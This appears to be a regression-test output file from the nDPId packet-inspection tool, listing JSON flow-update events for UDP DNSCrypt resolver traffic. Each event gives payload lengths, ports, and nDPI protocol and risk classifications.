-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00741{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00721{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305459,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305460,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00739{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00741{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305461,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
